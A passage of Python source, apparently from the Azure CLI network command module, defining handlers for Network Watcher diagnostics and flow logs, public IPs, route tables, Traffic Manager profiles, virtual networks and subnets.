subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_verify_ip_flow(
watcher_rg, watcher_name,
VerificationIPFlowParameters(
target_resource_id=vm, direction=direction, protocol=protocol, local_port=local_port,
remote_port=remote_port, local_ip_address=local_ip_address,
remote_ip_address=remote_ip_address, target_nic_resource_id=nic))
def show_nw_next_hop(cmd, client, resource_group_name, vm, watcher_rg, watcher_name,
source_ip, dest_ip, nic=None, location=None):
NextHopParameters = cmd.get_models('NextHopParameters')
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_get_next_hop(
watcher_rg, watcher_name, NextHopParameters(target_resource_id=vm,
source_ip_address=source_ip,
destination_ip_address=dest_ip,
target_nic_resource_id=nic))
def show_nw_security_view(cmd, client, resource_group_name, vm, watcher_rg, watcher_name, location=None):
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
security_group_view_parameters = cmd.get_models('SecurityGroupViewParameters')(target_resource_id=vm)
return client.begin_get_vm_security_rules(watcher_rg, watcher_name, security_group_view_parameters)
def create_nw_packet_capture(cmd, client, resource_group_name, capture_name, vm,
watcher_rg, watcher_name, location=None,
storage_account=None, storage_path=None, file_path=None,
capture_size=None, capture_limit=None, time_limit=None, filters=None):
PacketCapture, PacketCaptureStorageLocation = cmd.get_models('PacketCapture', 'PacketCaptureStorageLocation')
storage_settings = PacketCaptureStorageLocation(storage_id=storage_account,
storage_path=storage_path, file_path=file_path)
capture_params = PacketCapture(target=vm, storage_location=storage_settings,
bytes_to_capture_per_packet=capture_size,
total_bytes_per_session=capture_limit, time_limit_in_seconds=time_limit,
filters=filters)
return client.begin_create(watcher_rg, watcher_name, capture_name, capture_params)
def set_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, nsg, storage_account=None,
resource_group_name=None, enabled=None, retention=0, log_format=None, log_version=None,
traffic_analytics_workspace=None, traffic_analytics_interval=None,
traffic_analytics_enabled=None):
from azure.cli.core.commands import LongRunningOperation
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
config = LongRunningOperation(cmd.cli_ctx)(client.begin_get_flow_log_status(watcher_rg,
watcher_name,
flowlog_status_parameters))
try:
if not config.flow_analytics_configuration.network_watcher_flow_analytics_configuration.workspace_id:
config.flow_analytics_configuration = None
except AttributeError:
config.flow_analytics_configuration = None
with cmd.update_context(config) as c:
c.set_param('enabled', enabled if enabled is not None else config.enabled)
c.set_param('storage_id', storage_account or config.storage_id)
if retention is not None:
config.retention_policy = {
'days': retention,
'enabled': int(retention) > 0
}
if cmd.supported_api_version(min_api='2018-10-01') and (log_format or log_version):
config.format = {
'type': log_format,
'version': log_version
}
if cmd.supported_api_version(min_api='2018-10-01') and \
any([traffic_analytics_workspace is not None, traffic_analytics_enabled is not None]):
workspace = None
if traffic_analytics_workspace:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not config.flow_analytics_configuration:
# must create whole object
if not workspace:
raise CLIError('usage error (analytics not already configured): --workspace NAME_OR_ID '
'[--enabled {true|false}]')
if traffic_analytics_enabled is None:
traffic_analytics_enabled = True
config.flow_analytics_configuration = {
'network_watcher_flow_analytics_configuration': {
'enabled': traffic_analytics_enabled,
'workspace_id': workspace.properties['customerId'],
'workspace_region': workspace.location,
'workspace_resource_id': traffic_analytics_workspace,
'traffic_analytics_interval': traffic_analytics_interval
}
}
else:
# pylint: disable=line-too-long
with cmd.update_context(config.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
# update object
c.set_param('enabled', traffic_analytics_enabled)
if traffic_analytics_workspace == "":
config.flow_analytics_configuration = None
elif workspace:
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', traffic_analytics_workspace)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return client.begin_set_flow_log_configuration(watcher_rg, watcher_name, config)
# combination of resource_group_name and nsg is for old output
# combination of location and flow_log_name is for new output
def show_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, location=None, resource_group_name=None, nsg=None,
flow_log_name=None):
# deprecated approach to show flow log
if nsg is not None:
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
return client.begin_get_flow_log_status(watcher_rg, watcher_name, flowlog_status_parameters)
# new approach to show flow log
from ._client_factory import cf_flow_logs
client = cf_flow_logs(cmd.cli_ctx, None)
return client.get(watcher_rg, watcher_name, flow_log_name)
def create_nw_flow_log(cmd,
client,
location,
watcher_rg,
watcher_name,
flow_log_name,
nsg,
storage_account=None,
resource_group_name=None,
enabled=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
FlowLog = cmd.get_models('FlowLog')
flow_log = FlowLog(location=location,
target_resource_id=nsg,
storage_id=storage_account,
enabled=enabled,
tags=tags)
if retention > 0:
RetentionPolicyParameters = cmd.get_models('RetentionPolicyParameters')
retention_policy = RetentionPolicyParameters(days=retention, enabled=(retention > 0))
flow_log.retention_policy = retention_policy
if log_format is not None or log_version is not None:
FlowLogFormatParameters = cmd.get_models('FlowLogFormatParameters')
format_config = FlowLogFormatParameters(type=log_format, version=log_version)
flow_log.format = format_config
if traffic_analytics_workspace is not None:
TrafficAnalyticsProperties, TrafficAnalyticsConfigurationProperties = \
cmd.get_models('TrafficAnalyticsProperties', 'TrafficAnalyticsConfigurationProperties')
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
traffic_analytics_config = TrafficAnalyticsConfigurationProperties(
enabled=traffic_analytics_enabled,
workspace_id=workspace.properties['customerId'],
workspace_region=workspace.location,
workspace_resource_id=workspace.id,
traffic_analytics_interval=traffic_analytics_interval
)
traffic_analytics = TrafficAnalyticsProperties(
network_watcher_flow_analytics_configuration=traffic_analytics_config
)
flow_log.flow_analytics_configuration = traffic_analytics
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, flow_log)
def update_nw_flow_log_getter(client, watcher_rg, watcher_name, flow_log_name):
return client.get(watcher_rg, watcher_name, flow_log_name)
def update_nw_flow_log_setter(client, watcher_rg, watcher_name, flow_log_name, parameters):
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, parameters)
def update_nw_flow_log(cmd,
instance,
location,
resource_group_name=None, # dummy parameter to let it appear in command
enabled=None,
nsg=None,
storage_account=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
with cmd.update_context(instance) as c:
c.set_param('enabled', enabled)
c.set_param('tags', tags)
c.set_param('storage_id', storage_account)
c.set_param('target_resource_id', nsg)
with cmd.update_context(instance.retention_policy) as c:
c.set_param('days', retention)
c.set_param('enabled', retention > 0)
with cmd.update_context(instance.format) as c:
c.set_param('type', log_format)
c.set_param('version', log_version)
if traffic_analytics_workspace is not None:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
if instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration is None:
analytics_conf = cmd.get_models('TrafficAnalyticsConfigurationProperties')
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration = analytics_conf()
with cmd.update_context(
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
c.set_param('enabled', traffic_analytics_enabled)
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', workspace.id)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return instance
def list_nw_flow_log(client, watcher_rg, watcher_name, location):
return client.list(watcher_rg, watcher_name)
def delete_nw_flow_log(client, watcher_rg, watcher_name, location, flow_log_name):
return client.begin_delete(watcher_rg, watcher_name, flow_log_name)
def start_nw_troubleshooting(cmd, client, watcher_name, watcher_rg, resource, storage_account,
storage_path, resource_type=None, resource_group_name=None,
no_wait=False):
TroubleshootingParameters = cmd.get_models('TroubleshootingParameters')
params = TroubleshootingParameters(target_resource_id=resource, storage_id=storage_account,
storage_path=storage_path)
return sdk_no_wait(no_wait, client.begin_get_troubleshooting, watcher_rg, watcher_name, params)
def show_nw_troubleshooting_result(cmd, client, watcher_name, watcher_rg, resource, resource_type=None,
resource_group_name=None):
query_troubleshooting_parameters = cmd.get_models('QueryTroubleshootingParameters')(target_resource_id=resource)
return client.begin_get_troubleshooting_result(watcher_rg, watcher_name, query_troubleshooting_parameters)
def run_network_configuration_diagnostic(cmd, client, watcher_rg, watcher_name, resource,
direction=None, protocol=None, source=None, destination=None,
destination_port=None, queries=None,
resource_group_name=None, resource_type=None, parent=None):
NetworkConfigurationDiagnosticParameters, NetworkConfigurationDiagnosticProfile = \
cmd.get_models('NetworkConfigurationDiagnosticParameters', 'NetworkConfigurationDiagnosticProfile')
if not queries:
queries = [NetworkConfigurationDiagnosticProfile(
direction=direction,
protocol=protocol,
source=source,
destination=destination,
destination_port=destination_port
)]
params = NetworkConfigurationDiagnosticParameters(target_resource_id=resource, profiles=queries)
return client.begin_get_network_configuration_diagnostic(watcher_rg, watcher_name, params)
# endregion
# region CustomIpPrefix
def create_custom_ip_prefix(cmd, client, resource_group_name, custom_ip_prefix_name, location=None,
cidr=None, tags=None, zone=None, signed_message=None, authorization_message=None,
custom_ip_prefix_parent=None, no_wait=False):
CustomIpPrefix = cmd.get_models('CustomIpPrefix')
prefix = CustomIpPrefix(
location=location,
cidr=cidr,
zones=zone,
tags=tags,
signed_message=signed_message,
authorization_message=authorization_message
)
if custom_ip_prefix_parent:
try:
prefix.custom_ip_prefix_parent = client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Custom ip prefix parent {} doesn't exist".format(custom_ip_prefix_name))
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, custom_ip_prefix_name, prefix)
def update_custom_ip_prefix(instance, signed_message=None, authorization_message=None, tags=None):
if tags is not None:
instance.tags = tags
if signed_message is not None:
instance.signed_message = signed_message
if authorization_message is not None:
instance.authorization_message = authorization_message
return instance
# endregion
# region PublicIPAddresses
def create_public_ip(cmd, resource_group_name, public_ip_address_name, location=None, tags=None,
allocation_method=None, dns_name=None,
idle_timeout=4, reverse_fqdn=None, version=None, sku=None, tier=None, zone=None, ip_tags=None,
public_ip_prefix=None, edge_zone=None, ip_address=None):
IPAllocationMethod, PublicIPAddress, PublicIPAddressDnsSettings, SubResource = cmd.get_models(
'IPAllocationMethod', 'PublicIPAddress', 'PublicIPAddressDnsSettings', 'SubResource')
client = network_client_factory(cmd.cli_ctx).public_ip_addresses
if not allocation_method:
allocation_method = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
public_ip_args = {
'location': location,
'tags': tags,
'public_ip_allocation_method': allocation_method,
'idle_timeout_in_minutes': idle_timeout,
'ip_address': ip_address,
'dns_settings': None
}
if cmd.supported_api_version(min_api='2016-09-01'):
public_ip_args['public_ip_address_version'] = version
if cmd.supported_api_version(min_api='2017-06-01'):
public_ip_args['zones'] = zone
if cmd.supported_api_version(min_api='2017-11-01'):
public_ip_args['ip_tags'] = ip_tags
if cmd.supported_api_version(min_api='2018-07-01') and public_ip_prefix:
public_ip_args['public_ip_prefix'] = SubResource(id=public_ip_prefix)
if sku:
public_ip_args['sku'] = {'name': sku}
if tier:
if not sku:
public_ip_args['sku'] = {'name': 'Basic'}
public_ip_args['sku'].update({'tier': tier})
public_ip = PublicIPAddress(**public_ip_args)
if dns_name or reverse_fqdn:
public_ip.dns_settings = PublicIPAddressDnsSettings(
domain_name_label=dns_name,
reverse_fqdn=reverse_fqdn)
if edge_zone:
public_ip.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_address_name, public_ip)
def update_public_ip(cmd, instance, dns_name=None, allocation_method=None, version=None,
idle_timeout=None, reverse_fqdn=None, tags=None, sku=None, ip_tags=None,
public_ip_prefix=None):
if dns_name is not None or reverse_fqdn is not None:
if instance.dns_settings:
if dns_name is not None:
instance.dns_settings.domain_name_label = dns_name
if reverse_fqdn is not None:
instance.dns_settings.reverse_fqdn = reverse_fqdn
else:
PublicIPAddressDnsSettings = cmd.get_models('PublicIPAddressDnsSettings')
instance.dns_settings = PublicIPAddressDnsSettings(domain_name_label=dns_name, fqdn=None,
reverse_fqdn=reverse_fqdn)
if allocation_method is not None:
instance.public_ip_allocation_method = allocation_method
if version is not None:
instance.public_ip_address_version = version
if idle_timeout is not None:
instance.idle_timeout_in_minutes = idle_timeout
if tags is not None:
instance.tags = tags
if sku is not None:
instance.sku.name = sku
if ip_tags:
instance.ip_tags = ip_tags
if public_ip_prefix:
SubResource = cmd.get_models('SubResource')
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return instance
def create_public_ip_prefix(cmd, client, resource_group_name, public_ip_prefix_name, prefix_length,
version=None, location=None, tags=None, zone=None, edge_zone=None,
custom_ip_prefix_name=None):
PublicIPPrefix, PublicIPPrefixSku = cmd.get_models('PublicIPPrefix', 'PublicIPPrefixSku')
prefix = PublicIPPrefix(
location=location,
prefix_length=prefix_length,
sku=PublicIPPrefixSku(name='Standard'),
tags=tags,
zones=zone
)
if cmd.supported_api_version(min_api='2019-08-01'):
prefix.public_ip_address_version = version if version is not None else 'ipv4'
if cmd.supported_api_version(min_api='2020-06-01') and custom_ip_prefix_name:
cip_client = network_client_factory(cmd.cli_ctx).custom_ip_prefixes
try:
prefix.custom_ip_prefix = cip_client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError('Custom ip prefix {} doesn\'t exist.'.format(custom_ip_prefix_name))
if edge_zone:
prefix.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_prefix_name, prefix)
def update_public_ip_prefix(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region RouteFilters
def create_route_filter(cmd, client, resource_group_name, route_filter_name, location=None, tags=None):
RouteFilter = cmd.get_models('RouteFilter')
return client.begin_create_or_update(resource_group_name, route_filter_name,
RouteFilter(location=location, tags=tags))
def list_route_filters(client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_route_filter_rule(cmd, client, resource_group_name, route_filter_name, rule_name, access, communities,
location=None):
RouteFilterRule = cmd.get_models('RouteFilterRule')
return client.begin_create_or_update(resource_group_name, route_filter_name, rule_name,
RouteFilterRule(access=access, communities=communities,
location=location))
# endregion
# region RouteTables
def create_route_table(cmd, resource_group_name, route_table_name, location=None, tags=None,
disable_bgp_route_propagation=None):
RouteTable = cmd.get_models('RouteTable')
ncf = network_client_factory(cmd.cli_ctx)
route_table = RouteTable(location=location, tags=tags)
if cmd.supported_api_version(min_api='2017-10-01'):
route_table.disable_bgp_route_propagation = disable_bgp_route_propagation
return ncf.route_tables.begin_create_or_update(resource_group_name, route_table_name, route_table)
def update_route_table(instance, tags=None, disable_bgp_route_propagation=None):
if tags == '':
instance.tags = None
elif tags is not None:
instance.tags = tags
if disable_bgp_route_propagation is not None:
instance.disable_bgp_route_propagation = disable_bgp_route_propagation
return instance
def create_route(cmd, resource_group_name, route_table_name, route_name, next_hop_type, address_prefix,
next_hop_ip_address=None):
Route = cmd.get_models('Route')
route = Route(next_hop_type=next_hop_type, address_prefix=address_prefix,
next_hop_ip_address=next_hop_ip_address, name=route_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.routes.begin_create_or_update(resource_group_name, route_table_name, route_name, route)
def update_route(instance, address_prefix=None, next_hop_type=None, next_hop_ip_address=None):
if address_prefix is not None:
instance.address_prefix = address_prefix
if next_hop_type is not None:
instance.next_hop_type = next_hop_type
if next_hop_ip_address is not None:
instance.next_hop_ip_address = next_hop_ip_address
return instance
# endregion
# region ServiceEndpoints
def create_service_endpoint_policy(cmd, resource_group_name, service_endpoint_policy_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
ServiceEndpointPolicy = cmd.get_models('ServiceEndpointPolicy')
policy = ServiceEndpointPolicy(tags=tags, location=location)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name, policy)
def list_service_endpoint_policies(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def update_service_endpoint_policy(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
def create_service_endpoint_policy_definition(cmd, resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, service, service_resources,
description=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policy_definitions
ServiceEndpointPolicyDefinition = cmd.get_models('ServiceEndpointPolicyDefinition')
policy_def = ServiceEndpointPolicyDefinition(description=description, service=service,
service_resources=service_resources)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, policy_def)
def update_service_endpoint_policy_definition(instance, service=None, service_resources=None, description=None):
if service is not None:
instance.service = service
if service_resources is not None:
instance.service_resources = service_resources
if description is not None:
instance.description = description
return instance
# endregion
# region TrafficManagers
def list_traffic_manager_profiles(cmd, resource_group_name=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
def create_traffic_manager_profile(cmd, traffic_manager_profile_name, resource_group_name,
routing_method, unique_dns_name, monitor_path=None,
monitor_port=80, monitor_protocol=MonitorProtocol.http.value,
profile_status=ProfileStatus.enabled.value,
ttl=30, tags=None, interval=None, timeout=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Profile, DnsConfig, MonitorConfig
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if monitor_path is None and monitor_protocol == 'HTTP':
monitor_path = '/'
profile = Profile(location='global', tags=tags, profile_status=profile_status,
traffic_routing_method=routing_method,
dns_config=DnsConfig(relative_name=unique_dns_name, ttl=ttl),
monitor_config=MonitorConfig(protocol=monitor_protocol,
port=monitor_port,
path=monitor_path,
interval_in_seconds=interval,
timeout_in_seconds=timeout,
tolerated_number_of_failures=max_failures,
custom_headers=monitor_custom_headers,
expected_status_code_ranges=status_code_ranges),
max_return=max_return)
return client.create_or_update(resource_group_name, traffic_manager_profile_name, profile)
def update_traffic_manager_profile(instance, profile_status=None, routing_method=None, tags=None,
monitor_protocol=None, monitor_port=None, monitor_path=None,
ttl=None, timeout=None, interval=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
if tags is not None:
instance.tags = tags
if profile_status is not None:
instance.profile_status = profile_status
if routing_method is not None:
instance.traffic_routing_method = routing_method
if ttl is not None:
instance.dns_config.ttl = ttl
if monitor_protocol is not None:
instance.monitor_config.protocol = monitor_protocol
if monitor_port is not None:
instance.monitor_config.port = monitor_port
if monitor_path == '':
instance.monitor_config.path = None
elif monitor_path is not None:
instance.monitor_config.path = monitor_path
if interval is not None:
instance.monitor_config.interval_in_seconds = interval
if timeout is not None:
instance.monitor_config.timeout_in_seconds = timeout
if max_failures is not None:
instance.monitor_config.tolerated_number_of_failures = max_failures
if monitor_custom_headers is not None:
instance.monitor_config.custom_headers = monitor_custom_headers
if status_code_ranges is not None:
instance.monitor_config.expected_status_code_ranges = status_code_ranges
if max_return is not None:
instance.max_return = max_return
# TODO: Remove workaround after https://github.com/Azure/azure-rest-api-specs/issues/1940 fixed
for endpoint in instance.endpoints:
endpoint._validation = { # pylint: disable=protected-access
'name': {'readonly': False},
'type': {'readonly': False},
}
return instance
def create_traffic_manager_endpoint(cmd, resource_group_name, profile_name, endpoint_type, endpoint_name,
target_resource_id=None, target=None,
endpoint_status=None, weight=None, priority=None,
endpoint_location=None, endpoint_monitor_status=None,
min_child_endpoints=None, geo_mapping=None,
monitor_custom_headers=None, subnets=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Endpoint
ncf = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).endpoints
endpoint = Endpoint(target_resource_id=target_resource_id, target=target,
endpoint_status=endpoint_status, weight=weight, priority=priority,
endpoint_location=endpoint_location,
endpoint_monitor_status=endpoint_monitor_status,
min_child_endpoints=min_child_endpoints,
geo_mapping=geo_mapping,
subnets=subnets,
custom_headers=monitor_custom_headers)
return ncf.create_or_update(resource_group_name, profile_name, endpoint_type, endpoint_name,
endpoint)
def update_traffic_manager_endpoint(instance, endpoint_type=None, endpoint_location=None,
endpoint_status=None, endpoint_monitor_status=None,
priority=None, target=None, target_resource_id=None,
weight=None, min_child_endpoints=None, geo_mapping=None,
subnets=None, monitor_custom_headers=None):
if endpoint_location is not None:
instance.endpoint_location = endpoint_location
if endpoint_status is not None:
instance.endpoint_status = endpoint_status
if endpoint_monitor_status is not None:
instance.endpoint_monitor_status = endpoint_monitor_status
if priority is not None:
instance.priority = priority
if target is not None:
instance.target = target
if target_resource_id is not None:
instance.target_resource_id = target_resource_id
if weight is not None:
instance.weight = weight
if min_child_endpoints is not None:
instance.min_child_endpoints = min_child_endpoints
if geo_mapping is not None:
instance.geo_mapping = geo_mapping
if subnets is not None:
instance.subnets = subnets
if monitor_custom_headers:
instance.custom_headers = monitor_custom_headers
return instance
def list_traffic_manager_endpoints(cmd, resource_group_name, profile_name, endpoint_type=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
profile = client.get(resource_group_name, profile_name)
return [e for e in profile.endpoints if not endpoint_type or e.type.endswith(endpoint_type)]
# endregion
# region VirtualNetworks
# pylint: disable=too-many-locals
def create_vnet(cmd, resource_group_name, vnet_name, vnet_prefixes='10.0.0.0/16',
subnet_name=None, subnet_prefix=None, dns_servers=None,
location=None, tags=None, vm_protection=None, ddos_protection=None,
ddos_protection_plan=None, network_security_group=None, edge_zone=None, flowtimeout=None):
AddressSpace, DhcpOptions, Subnet, VirtualNetwork, SubResource, NetworkSecurityGroup = \
cmd.get_models('AddressSpace', 'DhcpOptions', 'Subnet', 'VirtualNetwork',
'SubResource', 'NetworkSecurityGroup')
client = network_client_factory(cmd.cli_ctx).virtual_networks
tags = tags or {}
vnet = VirtualNetwork(
location=location, tags=tags,
dhcp_options=DhcpOptions(dns_servers=dns_servers),
address_space=AddressSpace(address_prefixes=(vnet_prefixes if isinstance(vnet_prefixes, list) else [vnet_prefixes]))) # pylint: disable=line-too-long
if subnet_name:
if cmd.supported_api_version(min_api='2018-08-01'):
vnet.subnets = [Subnet(name=subnet_name,
address_prefix=subnet_prefix[0] if len(subnet_prefix) == 1 else None,
address_prefixes=subnet_prefix if len(subnet_prefix) > 1 else None,
network_security_group=NetworkSecurityGroup(id=network_security_group)
if network_security_group else None)]
else:
vnet.subnets = [Subnet(name=subnet_name, address_prefix=subnet_prefix)]
if cmd.supported_api_version(min_api='2017-09-01'):
vnet.enable_ddos_protection = ddos_protection
vnet.enable_vm_protection = vm_protection
if cmd.supported_api_version(min_api='2018-02-01'):
vnet.ddos_protection_plan = SubResource(id=ddos_protection_plan) if ddos_protection_plan else None
if edge_zone:
vnet.extended_location = _edge_zone_model(cmd, edge_zone)
if flowtimeout is not None:
vnet.flow_timeout_in_minutes = flowtimeout
return cached_put(cmd, client.begin_create_or_update, vnet, resource_group_name, vnet_name)
def update_vnet(cmd, instance, vnet_prefixes=None, dns_servers=None, ddos_protection=None, vm_protection=None,
ddos_protection_plan=None, flowtimeout=None):
# server side validation reports pretty good error message on invalid CIDR,
# so we don't validate at client side
AddressSpace, DhcpOptions, SubResource = cmd.get_models('AddressSpace', 'DhcpOptions', 'SubResource')
if vnet_prefixes and instance.address_space:
instance.address_space.address_prefixes = vnet_prefixes
elif vnet_prefixes:
instance.address_space = AddressSpace(address_prefixes=vnet_prefixes)
if dns_servers == ['']:
instance.dhcp_options.dns_servers = None
elif dns_servers and instance.dhcp_options:
instance.dhcp_options.dns_servers = dns_servers
elif dns_servers:
instance.dhcp_options = DhcpOptions(dns_servers=dns_servers)
if ddos_protection is not None:
instance.enable_ddos_protection = ddos_protection
if vm_protection is not None:
instance.enable_vm_protection = vm_protection
if ddos_protection_plan == '':
instance.ddos_protection_plan = None
elif ddos_protection_plan is not None:
instance.ddos_protection_plan = SubResource(id=ddos_protection_plan)
if flowtimeout is not None:
instance.flow_timeout_in_minutes = flowtimeout
return instance
def _set_route_table(ncf, resource_group_name, route_table, subnet):
if route_table:
is_id = is_valid_resource_id(route_table)
rt = None
if is_id:
res_id = parse_resource_id(route_table)
rt = ncf.route_tables.get(res_id['resource_group'], res_id['name'])
else:
rt = ncf.route_tables.get(resource_group_name, route_table)
subnet.route_table = rt
elif route_table == '':
subnet.route_table = None
def create_subnet(cmd, resource_group_name, virtual_network_name, subnet_name,
address_prefix, network_security_group=None,
route_table=None, service_endpoints=None, service_endpoint_policy=None,
delegations=None, nat_gateway=None,
disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, Subnet, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2018-08-01'):
subnet = Subnet(
name=subnet_name,
address_prefixes=address_prefix if len(address_prefix) > 1 else None,
address_prefix=address_prefix[0] if len(address_prefix) == 1 else None
)
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
subnet.nat_gateway = SubResource(id=nat_gateway)
else:
subnet = Subnet(name=subnet_name, address_prefix=address_prefix)
if network_security_group:
subnet.network_security_group = NetworkSecurityGroup(id=network_security_group)
_set_route_table(ncf, resource_group_name, route_table, subnet)
if service_endpoints:
subnet.service_endpoints = []
for service in service_endpoints:
subnet.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy:
subnet.service_endpoint_policies = []
for policy in service_endpoint_policy:
subnet.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
subnet.delegations = delegations
if disable_private_endpoint_network_policies is True:
subnet.private_endpoint_network_policies = "Disabled"
if disable_private_endpoint_network_policies is False:
subnet.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies is True:
subnet.private_link_service_network_policies = "Disabled"
if disable_private_link_service_network_policies is False:
subnet.private_link_service_network_policies = "Enabled"
vnet = cached_get(cmd, ncf.virtual_networks.get, resource_group_name, virtual_network_name)
upsert_to_collection(vnet, 'subnets', subnet, 'name')
vnet = cached_put(
cmd, ncf.virtual_networks.begin_create_or_update, vnet, resource_group_name, virtual_network_name).result()
return get_property(vnet.subnets, subnet_name)
def update_subnet(cmd, instance, resource_group_name, address_prefix=None, network_security_group=None,
route_table=None, service_endpoints=None, delegations=None, nat_gateway=None,
service_endpoint_policy=None, disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'SubResource')
if address_prefix:
if cmd.supported_api_version(min_api='2018-08-01'):
instance.address_prefixes = address_prefix if len(address_prefix) > 1 else None
instance.address_prefix = address_prefix[0] if len(address_prefix) == 1 else None
else:
instance.address_prefix = address_prefix
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
instance.nat_gateway = SubResource(id=nat_gateway)
elif nat_gateway == '':
instance.nat_gateway = None
if network_security_group:
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
elif network_security_group == '': # clear it
instance.network_security_group = None
_set_route_table(network_client_factory(cmd.cli_ctx), resource_group_name, route_table, instance)
if service_endpoints == ['']:
instance.service_endpoints = None
elif service_endpoints:
instance.service_endpoints = []
for service in service_endpoints:
instance.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy == '':
instance.service_endpoint_policies = None
elif service_endpoint_policy:
instance.service_endpoint_policies = []
for policy in service_endpoint_policy:
instance.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
instance.delegations = delegations
if disable_private_endpoint_network_policies:
instance.private_endpoint_network_policies = "Disabled"
elif disable_private_endpoint_network_policies is not None:
instance.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies:
instance.private_link_service_network_policies = "Disabled"
elif disable_private_link_service_network_policies is not None:
instance.private_link_service_network_policies = "Enabled"
return instance
def list_avail_subnet_delegations(cmd, resource_group_name=None, location=None):
client = network_client_factory(cmd.cli_ctx)
if resource_group_name:
return client.available_resource_group_delegations.list(location, resource_group_name)
return client.available_delegations.list(location)
def create_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name,
remote_virtual_network, allow_virtual_network_access=False,
allow_forwarded_traffic=False, allow_gateway_transit=False,
use_remote_gateways=False):
